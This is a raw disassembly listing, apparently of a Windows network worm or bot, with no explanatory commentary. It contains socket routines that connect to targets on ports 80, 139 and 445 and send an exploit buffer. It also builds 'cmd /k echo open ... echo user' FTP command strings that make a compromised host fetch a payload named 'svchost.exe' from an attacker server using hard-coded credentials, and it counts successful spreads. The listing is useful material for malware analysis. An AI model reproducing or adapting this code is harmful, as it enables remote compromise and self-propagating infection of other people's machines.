loc_40C2F1: ; CODE XREF: sub_40C2D9+11�j
mov eax, [ebx+14h]
sub eax, edi
cmp eax, [ebp+arg_8]
jnb short loc_40C2FE
mov [ebp+arg_8], eax
loc_40C2FE: ; CODE XREF: sub_40C2D9+20�j
or eax, 0FFFFFFFFh
sub eax, [esi+14h]
cmp eax, [ebp+arg_8]
ja short loc_40C310
mov ecx, esi
call sub_417E2C
loc_40C310: ; CODE XREF: sub_40C2D9+2E�j
cmp [ebp+arg_8], 0
jbe short loc_40C365
mov edi, [esi+14h]
add edi, [ebp+arg_8]
push 0
push edi
mov ecx, esi
call sub_40C27D
test al, al
jz short loc_40C365
cmp dword ptr [ebx+18h], 10h
jb short loc_40C335
mov ebx, [ebx+4]
jmp short loc_40C338
; ---------------------------------------------------------------------------
loc_40C335: ; CODE XREF: sub_40C2D9+55�j
add ebx, 4
loc_40C338: ; CODE XREF: sub_40C2D9+5A�j
cmp dword ptr [esi+18h], 10h
jb short loc_40C343
mov eax, [esi+4]
jmp short loc_40C346
; ---------------------------------------------------------------------------
loc_40C343: ; CODE XREF: sub_40C2D9+63�j
lea eax, [esi+4]
loc_40C346: ; CODE XREF: sub_40C2D9+68�j
mov ecx, [ebp+arg_4]
push [ebp+arg_8]
add ebx, ecx
mov ecx, [esi+14h]
add ecx, eax
push ebx
push ecx
call sub_40E3A0
add esp, 0Ch
push edi
mov ecx, esi
call sub_40C16E
loc_40C365: ; CODE XREF: sub_40C2D9+3B�j
; sub_40C2D9+4F�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40C2D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C36E proc near ; CODE XREF: sub_40C4D8+33�p
; sub_40C4D8+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, ecx
cmp [edi+14h], esi
jnb short loc_40C382
call sub_417D91
loc_40C382: ; CODE XREF: sub_40C36E+D�j
mov eax, [edi+14h]
sub eax, esi
cmp eax, [ebp+arg_4]
jnb short loc_40C38F
mov [ebp+arg_4], eax
loc_40C38F: ; CODE XREF: sub_40C36E+1C�j
cmp [ebp+arg_4], 0
jbe short loc_40C3E0
push ebx
mov ebx, [edi+18h]
cmp ebx, 10h
lea ecx, [edi+4]
jb short loc_40C3A5
mov edx, [ecx]
jmp short loc_40C3A7
; ---------------------------------------------------------------------------
loc_40C3A5: ; CODE XREF: sub_40C36E+31�j
mov edx, ecx
loc_40C3A7: ; CODE XREF: sub_40C36E+35�j
cmp ebx, 10h
pop ebx
jb short loc_40C3AF
mov ecx, [ecx]
loc_40C3AF: ; CODE XREF: sub_40C36E+3D�j
sub eax, [ebp+arg_4]
add edx, esi
add edx, [ebp+arg_4]
push eax
push edx
add ecx, esi
push ecx
call sub_40F260
mov esi, [edi+14h]
sub esi, [ebp+arg_4]
add esp, 0Ch
push 0
push esi
mov ecx, edi
call sub_40C27D
test al, al
jz short loc_40C3E0
push esi
mov ecx, edi
call sub_40C16E
loc_40C3E0: ; CODE XREF: sub_40C36E+25�j
; sub_40C36E+68�j
mov eax, edi
pop edi
pop esi
pop ebp
retn 8
sub_40C36E endp
; =============== S U B R O U T I N E =======================================
sub_40C3E8 proc near ; CODE XREF: sub_40C62F+117�p
; sub_40C62F+148�p
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
or eax, 0FFFFFFFFh
mov esi, ecx
sub eax, [esi+14h]
cmp eax, ebx
ja short loc_40C3FF
call sub_417E2C
loc_40C3FF: ; CODE XREF: sub_40C3E8+10�j
test ebx, ebx
jbe short loc_40C441
push edi
mov edi, [esi+14h]
push 0
add edi, ebx
push edi
mov ecx, esi
call sub_40C27D
test al, al
jz short loc_40C440
cmp dword ptr [esi+18h], 10h
jb short loc_40C422
mov eax, [esi+4]
jmp short loc_40C425
; ---------------------------------------------------------------------------
loc_40C422: ; CODE XREF: sub_40C3E8+33�j
lea eax, [esi+4]
loc_40C425: ; CODE XREF: sub_40C3E8+38�j
push [esp+8+arg_8]
mov ecx, [esi+14h]
add ecx, eax
push ebx
push ecx
call sub_40B91A
add esp, 0Ch
push edi
mov ecx, esi
call sub_40C16E
loc_40C440: ; CODE XREF: sub_40C3E8+2D�j
pop edi
loc_40C441: ; CODE XREF: sub_40C3E8+19�j
mov eax, esi
pop esi
pop ebx
retn 8
sub_40C3E8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C448 proc near ; CODE XREF: sub_40C5F5+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
mov esi, ecx
call sub_40C139
test al, al
jz short loc_40C47A
cmp dword ptr [esi+18h], 10h
jb short loc_40C467
mov eax, [esi+4]
jmp short loc_40C46A
; ---------------------------------------------------------------------------
loc_40C467: ; CODE XREF: sub_40C448+18�j
lea eax, [esi+4]
loc_40C46A: ; CODE XREF: sub_40C448+1D�j
push [ebp+arg_4]
sub ebx, eax
push ebx
push esi
mov ecx, esi
call sub_40C2D9
jmp short loc_40C4D2
; ---------------------------------------------------------------------------
loc_40C47A: ; CODE XREF: sub_40C448+12�j
or eax, 0FFFFFFFFh
sub eax, [esi+14h]
cmp eax, [ebp+arg_4]
ja short loc_40C48C
mov ecx, esi
call sub_417E2C
loc_40C48C: ; CODE XREF: sub_40C448+3B�j
cmp [ebp+arg_4], 0
jbe short loc_40C4D0
push edi
mov edi, [esi+14h]
add edi, [ebp+arg_4]
push 0
push edi
mov ecx, esi
call sub_40C27D
test al, al
jz short loc_40C4CF
cmp dword ptr [esi+18h], 10h
jb short loc_40C4B2
mov eax, [esi+4]
jmp short loc_40C4B5
; ---------------------------------------------------------------------------
loc_40C4B2: ; CODE XREF: sub_40C448+63�j
lea eax, [esi+4]
loc_40C4B5: ; CODE XREF: sub_40C448+68�j
push [ebp+arg_4]
mov ecx, [esi+14h]
add ecx, eax
push ebx
push ecx
call sub_40E3A0
add esp, 0Ch
push edi
mov ecx, esi
call sub_40C16E
loc_40C4CF: ; CODE XREF: sub_40C448+5D�j
pop edi
loc_40C4D0: ; CODE XREF: sub_40C448+48�j
mov eax, esi
loc_40C4D2: ; CODE XREF: sub_40C448+30�j
pop esi
pop ebx
pop ebp
retn 8
sub_40C448 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C4D8 proc near ; CODE XREF: sub_40C567+2B�p
; sub_40C5D6+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_40C4F0
call sub_417D91
loc_40C4F0: ; CODE XREF: sub_40C4D8+11�j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_40C500
mov esi, [ebp+arg_8]
loc_40C500: ; CODE XREF: sub_40C4D8+23�j
cmp ebx, edi
mov ecx, ebx
jnz short loc_40C51E
push 0FFFFFFFFh
add esi, eax
push esi
call sub_40C36E
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_40C36E
jmp short loc_40C55E
; ---------------------------------------------------------------------------
loc_40C51E: ; CODE XREF: sub_40C4D8+2C�j
push 1
push esi
call sub_40C27D
test al, al
jz short loc_40C55E
cmp dword ptr [edi+18h], 10h
jb short loc_40C535
mov edi, [edi+4]
jmp short loc_40C538
; ---------------------------------------------------------------------------
loc_40C535: ; CODE XREF: sub_40C4D8+56�j
add edi, 4
loc_40C538: ; CODE XREF: sub_40C4D8+5B�j
cmp dword ptr [ebx+18h], 10h
jb short loc_40C543
mov eax, [ebx+4]
jmp short loc_40C546
; ---------------------------------------------------------------------------
loc_40C543: ; CODE XREF: sub_40C4D8+64�j
lea eax, [ebx+4]
loc_40C546: ; CODE XREF: sub_40C4D8+69�j
mov ecx, [ebp+arg_4]
push esi
add edi, ecx
push edi
push eax
call sub_40E3A0
add esp, 0Ch
push esi
mov ecx, ebx
call sub_40C16E
loc_40C55E: ; CODE XREF: sub_40C4D8+44�j
; sub_40C4D8+50�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_40C4D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C567 proc near ; CODE XREF: sub_40C612+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_40C139
test al, al
jz short loc_40C599
cmp dword ptr [esi+18h], 10h
jb short loc_40C586
mov eax, [esi+4]
jmp short loc_40C589
; ---------------------------------------------------------------------------
loc_40C586: ; CODE XREF: sub_40C567+18�j
lea eax, [esi+4]
loc_40C589: ; CODE XREF: sub_40C567+1D�j
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_40C4D8
jmp short loc_40C5D0
; ---------------------------------------------------------------------------
loc_40C599: ; CODE XREF: sub_40C567+12�j
push 1
push [ebp+arg_4]
mov ecx, esi
call sub_40C27D
test al, al
jz short loc_40C5CE
cmp dword ptr [esi+18h], 10h
jb short loc_40C5B4
mov eax, [esi+4]
jmp short loc_40C5B7
; ---------------------------------------------------------------------------
loc_40C5B4: ; CODE XREF: sub_40C567+46�j
lea eax, [esi+4]
loc_40C5B7: ; CODE XREF: sub_40C567+4B�j
push [ebp+arg_4]
push edi
push eax
call sub_40E3A0
add esp, 0Ch
push [ebp+arg_4]
mov ecx, esi
call sub_40C16E
loc_40C5CE: ; CODE XREF: sub_40C567+40�j
mov eax, esi
loc_40C5D0: ; CODE XREF: sub_40C567+30�j
pop edi
pop esi
pop ebp
retn 8
sub_40C567 endp
; =============== S U B R O U T I N E =======================================
sub_40C5D6 proc near ; CODE XREF: sub_40C62F+162�p
; sub_417CC2+26�p ...
arg_0 = dword ptr 4
push esi
push 0
mov esi, ecx
call sub_40C18A
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_40C4D8
mov eax, esi
pop esi
retn 4
sub_40C5D6 endp
; =============== S U B R O U T I N E =======================================
sub_40C5F5 proc near ; CODE XREF: sub_40C62F+12E�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_40D630
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40C448
pop esi
retn 4
sub_40C5F5 endp
; =============== S U B R O U T I N E =======================================
sub_40C612 proc near ; CODE XREF: sub_40C85D+10�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_40D630
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40C567
pop esi
retn 4
sub_40C612 endp
; =============== S U B R O U T I N E =======================================
sub_40C62F proc near ; CODE XREF: sub_40C7B0+24�p
var_40 = qword ptr -40h
mov eax, offset loc_417FF9
call sub_40F234
sub esp, 2Ch
push edi
xor edi, edi
push edi
lea ecx, [ebp-38h]
mov [ebp-1Ch], edi
mov dword ptr [ebp-20h], 0Fh
call sub_40C16E
push dword ptr [ebp+10h]
mov [ebp-4], edi
call sub_40C0E1
cmp [ebp-20h], eax
pop ecx
jnb short loc_40C66D
push edi
push eax
lea ecx, [ebp-38h]
call sub_40C27D
loc_40C66D: ; CODE XREF: sub_40C62F+32�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_40C78A
push ebx
mov ebx, [ebp+10h]
push esi
loc_40C67E: ; CODE XREF: sub_40C62F+153�j
cmp dword ptr [ebp+10h], 3
jb short loc_40C689
push 3
loc_40C686: ; CODE XREF: sub_40C62F+62�j
pop ebx
jmp short loc_40C69C
; ---------------------------------------------------------------------------
loc_40C689: ; CODE XREF: sub_40C62F+53�j
cmp dword ptr [ebp+10h], 2
jnz short loc_40C693
push 2
jmp short loc_40C686
; ---------------------------------------------------------------------------
loc_40C693: ; CODE XREF: sub_40C62F+5E�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40C69C
xor ebx, ebx
inc ebx
loc_40C69C: ; CODE XREF: sub_40C62F+58�j
; sub_40C62F+68�j
test ebx, ebx
mov [ebp-1Ch], ebx
fild dword ptr [ebp-1Ch]
jge short loc_40C6AC
fadd dbl_419F58
loc_40C6AC: ; CODE XREF: sub_40C62F+75�j
fmul dbl_41B8B8
push ecx
push ecx
fstp [esp+40h+var_40]
call sub_40F710
pop ecx
pop ecx
call sub_40E2E4
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_40C6E2
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
lea edi, [ebp-10h]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_40C6E2: ; CODE XREF: sub_40C62F+99�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
add [ebp+0Ch], ebx
sub [ebp+10h], ebx
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
and dl, 3
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and cl, 3
and dl, 0Fh
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
xor esi, esi
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_40C751
add [ebp-18h], eax
loc_40C734: ; CODE XREF: sub_40C62F+120�j
movsx eax, byte ptr [ebp+esi-14h]
movsx eax, byte_41FAE0[eax]
push eax
push 1
lea ecx, [ebp-38h]
call sub_40C3E8
inc esi
cmp esi, [ebp-1Ch]
jb short loc_40C734
loc_40C751: ; CODE XREF: sub_40C62F+100�j
cmp dword ptr [ebp-18h], 48h
jb short loc_40C765
push dword ptr [ebp+14h]
lea ecx, [ebp-38h]
call sub_40C5F5
mov [ebp-18h], edi
loc_40C765: ; CODE XREF: sub_40C62F+126�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_40C77F
sub esi, [ebp-1Ch]
loc_40C770: ; CODE XREF: sub_40C62F+14E�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_40C3E8
dec esi
jnz short loc_40C770
loc_40C77F: ; CODE XREF: sub_40C62F+13C�j
cmp [ebp+10h], edi
ja loc_40C67E
pop esi
pop ebx
loc_40C78A: ; CODE XREF: sub_40C62F+44�j
mov ecx, [ebp+8]
lea eax, [ebp-38h]
push eax
call sub_40C5D6
push 1
lea ecx, [ebp-38h]
call sub_40C18A
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
mov large fs:0, ecx
leave
retn
sub_40C62F endp
; =============== S U B R O U T I N E =======================================
sub_40C7B0 proc near ; CODE XREF: sub_40C878+120�p
mov eax, offset loc_418013
call sub_40F234
sub esp, 1Ch
push ebx
push esi
push edi
push offset word_41994E
push dword ptr [ebp+10h]
lea eax, [ebp-28h]
push dword ptr [ebp+0Ch]
xor ebx, ebx
push eax
mov [ebp-4], ebx
call sub_40C62F
mov eax, [ebp+28h]
mov ecx, [ebp-14h]
lea esi, [ecx+eax+36h]
push esi
mov byte ptr [ebp-4], 1
call sub_40E74F
mov edi, eax
add esp, 14h
cmp edi, ebx
jz short loc_40C838
cmp dword ptr [ebp-10h], 10h
mov ecx, [ebp-24h]
jnb short loc_40C802
lea ecx, [ebp-24h]
loc_40C802: ; CODE XREF: sub_40C7B0+4D�j
cmp dword ptr [ebp+2Ch], 10h
mov eax, [ebp+18h]
jnb short loc_40C80E
lea eax, [ebp+18h]
loc_40C80E: ; CODE XREF: sub_40C7B0+59�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_40DFEC
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call dword_4C4724
cmp eax, esi
jnz short loc_40C831
mov bl, 1
loc_40C831: ; CODE XREF: sub_40C7B0+7D�j
push edi
call sub_40E359
pop ecx
loc_40C838: ; CODE XREF: sub_40C7B0+44�j
push 1
lea ecx, [ebp-28h]
call sub_40C18A
push 1
lea ecx, [ebp+14h]
call sub_40C18A
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, bl
pop ebx
mov large fs:0, ecx
leave
retn
sub_40C7B0 endp
; =============== S U B R O U T I N E =======================================
sub_40C85D proc near ; CODE XREF: sub_40C878+114�p
; sub_417D91+15�p ...
arg_0 = dword ptr 4
push esi
push 0
mov esi, ecx
call sub_40C18A
push [esp+4+arg_0]
mov ecx, esi
call sub_40C612
mov eax, esi
pop esi
retn 4
sub_40C85D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C878 proc near ; CODE XREF: sub_40AD8F+1D5�p
; DATA XREF: .text:off_41EE7C�o
var_820 = byte ptr -820h
var_420 = byte ptr -420h
var_41F = byte ptr -41Fh
var_391 = byte ptr -391h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 820h
and [ebp+var_420], 0
push ebx
push esi
push edi
xor eax, eax
mov ecx, 0FFh
lea edi, [ebp+var_41F]
rep stosd
stosw
push 8Fh
stosb
lea eax, [ebp+var_420]
push offset sub_41FC90
push eax
call sub_40E3A0
mov eax, offset aSvchost_exe ; "svchost.exe"
push eax
push eax
push offset aPassword ; "password"
push offset aMircosoft ; "mircosoft"
push dword_41E264
lea eax, [ebp+var_391]
push offset aMs_microsoft_c ; "ms.microsoft.com"
push offset aCmdKEchoOpenSD ; "cmd /k echo open %s %d > o&echo user %s"...
push 400h
push eax
call sub_40DFEC
add eax, 90h
push eax
lea eax, [ebp+var_420]
push eax
push 164h
lea eax, [ebp+var_8]
push offset sub_41FB28
push eax
call sub_40BB9B
xor esi, esi
add esp, 44h
cmp [ebp+var_4], esi
jnz short loc_40C916
xor eax, eax
jmp loc_40CA54
; ---------------------------------------------------------------------------
loc_40C916: ; CODE XREF: sub_40C878+95�j
mov [ebp+var_C], esi
loc_40C919: ; CODE XREF: sub_40C878+17F�j
test esi, esi
jnz loc_40C9FD
push 6
push 1
push 2
call dword_419238 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40C9E5
push [ebp+arg_A0]
xor eax, eax
lea edi, [ebp+var_1A]
stosd
stosd
stosd
stosw
mov [ebp+var_1C], 2
call dword_4C47DC
mov [ebp+var_1A], ax
lea eax, [ebp+arg_4]
push eax
call dword_4C4704
mov [ebp+var_18], eax
push 10h
lea eax, [ebp+var_1C]
push eax
push ebx
call dword_4C463C
cmp eax, 0FFFFFFFFh
jz short loc_40C9DA
cmp [ebp+arg_A0], 50h
jnz short loc_40C9A2
sub esp, 1Ch
lea eax, [ebp+arg_4]
mov ecx, esp
mov [ebp+var_20], esp
push eax
call sub_40C85D
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_40C7B0
add esp, 28h
jmp short loc_40C9D7
; ---------------------------------------------------------------------------
loc_40C9A2: ; CODE XREF: sub_40C878+106�j
cmp [ebp+arg_A0], 8Bh
jnz short loc_40C9BC
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_40C08F
jmp short loc_40C9D4
; ---------------------------------------------------------------------------
loc_40C9BC: ; CODE XREF: sub_40C878+134�j
cmp [ebp+arg_A0], 1BDh
jnz short loc_40C9DA
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_40BFB5
loc_40C9D4: ; CODE XREF: sub_40C878+142�j
add esp, 0Ch
loc_40C9D7: ; CODE XREF: sub_40C878+128�j
movzx esi, al
loc_40C9DA: ; CODE XREF: sub_40C878+FD�j
; sub_40C878+14E�j
push ebx
call dword_4C479C
test esi, esi
jnz short loc_40C9F0
loc_40C9E5: ; CODE XREF: sub_40C878+BA�j
push 3E8h
call dword_419060 ; Sleep
loc_40C9F0: ; CODE XREF: sub_40C878+16B�j
inc [ebp+var_C]
cmp [ebp+var_C], 2
jl loc_40C919
loc_40C9FD: ; CODE XREF: sub_40C878+A3�j
lea ecx, [ebp+var_8]
call sub_40B9CA
test esi, esi
jz short loc_40CA52
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aAsn445 ; "asn|445"
push eax
push offset aSS_ ; "%s// %s."
lea eax, [ebp+var_820]
push 400h
push eax
call sub_40DFEC
lea eax, [ebp+var_820]
push eax
call sub_401648
mov eax, [ebp+arg_A8]
imul eax, 3Ch
lea eax, dword_41EE80[eax]
add esp, 18h
inc dword ptr [eax]
loc_40CA52: ; CODE XREF: sub_40C878+18F�j
mov eax, esi
loc_40CA54: ; CODE XREF: sub_40C878+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C878 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA59 proc near ; CODE XREF: .text:0040CBE4�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push 10h
xor esi, esi
lea eax, [ebp+var_10]
push esi
push eax
call sub_40D7B0
add esp, 0Ch
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_10], 2
call dword_419248 ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call dword_419234 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_419238 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40CABC
push 10h
lea eax, [ebp+var_10]
push eax
push ebx
call dword_41923C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40CAC3
loc_40CABC: ; CODE XREF: sub_40CA59+4F�j
xor eax, eax
jmp loc_40CB4F
; ---------------------------------------------------------------------------
loc_40CAC3: ; CODE XREF: sub_40CA59+61�j
push edi
push esi
mov esi, dword_419224
mov edi, 400h
push edi
lea eax, [ebp+var_5A0]
push eax
push ebx
call esi ; recv
mov eax, offset aSvchost_exe ; "svchost.exe"
push eax
push eax
push offset aPassword ; "password"
push offset aMircosoft ; "mircosoft"
push dword_41E264
lea eax, [ebp+var_1A0]
push offset aMs_microsoft_c ; "ms.microsoft.com"
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
push 190h
push eax
call sub_40DFEC
add esp, 24h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_419258 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40CB37
xor eax, eax
jmp short loc_40CB4E
; ---------------------------------------------------------------------------
loc_40CB37: ; CODE XREF: sub_40CA59+D8�j
push 0
push edi
lea eax, [ebp+var_5A0]
push eax
push ebx
call esi ; recv
push ebx
call dword_419240 ; closesocket
xor eax, eax
inc eax
loc_40CB4E: ; CODE XREF: sub_40CA59+DC�j
pop edi
loc_40CB4F: ; CODE XREF: sub_40CA59+65�j
pop esi
pop ebx
leave
retn
sub_40CA59 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-10h], 2
call dword_4C4704
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call dword_4C47DC
push 6
push 1
push 2
mov [ebp-0Eh], ax
call dword_419238 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40CBC5
push 10h
lea eax, [ebp-10h]
push eax
push esi
call dword_41923C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40CBA6
push esi
jmp short loc_40CBBF
; ---------------------------------------------------------------------------
loc_40CBA6: ; CODE XREF: .text:0040CBA1�j
push 0
push 1213h
push (offset loc_41FD1F+1)
push esi
call dword_419258 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40CBC9
loc_40CBBF: ; CODE XREF: .text:0040CBA4�j
call dword_419240 ; closesocket
loc_40CBC5: ; CODE XREF: .text:0040CB8F�j
xor eax, eax
jmp short loc_40CC07
; ---------------------------------------------------------------------------
loc_40CBC9: ; CODE XREF: .text:0040CBBD�j
call dword_419240 ; closesocket
push 216Bh
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40CA59
add esp, 0C0h
test eax, eax
jz short loc_40CC04
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_41EE80[eax]
inc dword ptr [eax]
loc_40CC04: ; CODE XREF: .text:0040CBF1�j
xor eax, eax
inc eax
loc_40CC07: ; CODE XREF: .text:0040CBC7�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC0B proc near ; CODE XREF: .text:0040D250�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, [ebp+arg_4]
lea eax, [ebp+var_8]
xor esi, esi
sub edi, eax
loc_40CC1C: ; CODE XREF: sub_40CC0B+32�j
push [ebp+arg_4]
call sub_40D630
cmp esi, eax
pop ecx
jnb short loc_40CC34
lea eax, [ebp+esi+var_8]
mov cl, [edi+eax]
mov [eax], cl
jmp short loc_40CC39
; ---------------------------------------------------------------------------
loc_40CC34: ; CODE XREF: sub_40CC0B+1C�j
and [ebp+esi+var_8], 0
loc_40CC39: ; CODE XREF: sub_40CC0B+27�j
inc esi
cmp esi, 8
jb short loc_40CC1C
lea eax, [ebp+var_8]
push 0
push eax
call sub_40557C
mov esi, [ebp+arg_0]
pop ecx
pop ecx
push 2
pop edi
loc_40CC52: ; CODE XREF: sub_40CC0B+54�j
push esi
push esi
call sub_40554F
pop ecx
add esi, 8
dec edi
pop ecx
jnz short loc_40CC52
pop edi
pop esi
leave
retn
sub_40CC0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC65 proc near ; CODE XREF: .text:0040D23D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
sub edi, esi
loc_40CC75: ; CODE XREF: sub_40CC65+2C�j
push [ebp+arg_4]
call sub_40D630
cmp ebx, eax
pop ecx
jnb short loc_40CC89
mov al, [edi+esi]
mov [esi], al
jmp short loc_40CC8C
; ---------------------------------------------------------------------------
loc_40CC89: ; CODE XREF: sub_40CC65+1B�j
and byte ptr [esi], 0
loc_40CC8C: ; CODE XREF: sub_40CC65+22�j
inc ebx
inc esi
cmp ebx, 8
jb short loc_40CC75
push 0
push offset dword_420F6C
call sub_40557C
push [ebp+arg_0]
push [ebp+arg_0]
call sub_40554F
add esp, 10h
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40CC65 endp
; =============== S U B R O U T I N E =======================================
sub_40CCB2 proc near ; CODE XREF: sub_40CD30+14�p
; .text:0040D06F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
jmp short loc_40CCDD
; ---------------------------------------------------------------------------
loc_40CCBC: ; CODE XREF: sub_40CCB2+2D�j
mov eax, [esp+8+arg_4]
push 0
push edi
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_419224 ; recv
test eax, eax
jz short loc_40CCE7
cmp eax, 0FFFFFFFFh
jz short loc_40CCE7
sub edi, eax
add esi, eax
loc_40CCDD: ; CODE XREF: sub_40CCB2+8�j
test edi, edi
jg short loc_40CCBC
xor eax, eax
inc eax
loc_40CCE4: ; CODE XREF: sub_40CCB2+37�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40CCE7: ; CODE XREF: sub_40CCB2+20�j
; sub_40CCB2+25�j
xor eax, eax
jmp short loc_40CCE4
sub_40CCB2 endp
; =============== S U B R O U T I N E =======================================
sub_40CCEB proc near ; CODE XREF: .text:0040D0F7�p
; .text:0040D135�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
mov edi, [esp+4+arg_8]
test edi, edi
jnz short loc_40CCF8
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_40CCF8: ; CODE XREF: sub_40CCEB+7�j
push esi
xor esi, esi
test edi, edi
jle short loc_40CD26
loc_40CCFF: ; CODE XREF: sub_40CCEB+39�j
push 0
mov eax, edi
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_419258 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40CD2C
test eax, eax
jz short loc_40CD2C
add esi, eax
cmp esi, edi
jl short loc_40CCFF
loc_40CD26: ; CODE XREF: sub_40CCEB+12�j
xor eax, eax
inc eax
loc_40CD29: ; CODE XREF: sub_40CCEB+43�j
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40CD2C: ; CODE XREF: sub_40CCEB+2F�j
; sub_40CCEB+33�j
xor eax, eax
jmp short loc_40CD29
sub_40CCEB endp
